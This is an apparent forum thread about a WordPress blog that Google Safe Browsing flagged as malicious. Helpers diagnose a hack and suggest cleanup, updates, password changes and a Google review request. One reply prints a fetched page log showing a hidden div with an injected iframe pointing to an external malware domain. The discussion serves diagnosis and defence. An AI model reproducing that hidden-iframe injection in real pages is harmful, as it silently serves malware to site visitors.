I recently checked my site at Google safebrowsing. To my surprise, Google detects that my site is listed as suspicious: http://safebrowsing.clients.google....refox&hl=en-US&site=http://www.apmevegas.com/ I swear I didn't upload any malicious software into it. What may be the cause of this? How can I prevent it? Please give me some advices. Thank you.
check in source code, if there is java script which automatic generated, clear code in site and ftp and upload again and send reinclusion request in google.
"Malicious software is hosted on 1 domain(s), including agend[dot]ru" Do you know why agend,ru is mentioned in the report? Oh, I see... Looks like you may have been hacked... Unless that's your iframe! http://www.rexswain.com/httpview.html • Finding host IP address... • Host IP address = 218.213.228.76 • Finding TCP protocol... • Binding to local socket... • Connecting to host... • Sending request... • Waiting for response... Receiving Header: HTTP/1.1·301·Moved·Permanently Date:·Tue,·29·Sep·2009·06:18:58·GMT Server:·Apache/2 X-Powered-By:·PHP/5.2.6 X-Pingback:·[url]http://apmevegas[/url][dot]com/xmlrpc[dot]php Location:·[url]http://www.apmevegas[/url][dot]com/ Cache-Control:·max-age=0 Expires:·Tue,·29·Sep·2009·06:18:58·GMT Vary:·Accept-Encoding,User-Agent Content-Length:·410 Connection:·close Content-Type:·text/html;·charset=UTF-8 End of Header (Length = 376) • Elapsed time so far: 8 seconds • Waiting for additional response until connection closes... Total bytes received = 786 Elapsed time so far: 8 seconds Content (Length = 410): <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"></div> <div·style="display:none"><iframe·width=277·height=497·src="http://on-liffe[dot]ru:8080/index.php"·></iframe></div> Done Code (markup): Cheers James
Yes it gives this warning when there is some kind of virus on your site, after you clean it up, submit review request through Google Webmaster Tools for removal of that warning in Google Search Results.
Do you have any idea why this iFrame appears in my blog source code? How can I get hacked? Is it due to Wordpress problem? How do I remove that? Should I simply remove the iFrame code? How can I prevent this thing from happening? Thank you.
I don't think removing the iframe will be enough, you will need to find out how they were able to get in and fix it so it doesn't happen again. There may be a vulnerability in wordpress itself, or one of the plugins you have installed on you blog. Check to make sure you have all the latest updates. It would probably be best to ask in the wordpress section. (I have no idea about it/never used it) Safe Browsing diagnostic tool Hope that helps. Cheers James
+1 to everything that James said but do change all your passwords related to this blog/server before (and perhaps after as well - in case everything you do is currently monitored by the hacker) doing all that.
Nearly all of the blogs hosted in that web hosting are having the same problem with that iFrame added, but where (while file) can I find this iFrame code and delete such malicious code?
I would highly suggest you go have a look around over here. If you can't find the answer using the search, then ask. Hope that helps. Cheers James
But any more advices on how can I prevent this from happening? Also, how can I let my site to get indexed again in Google?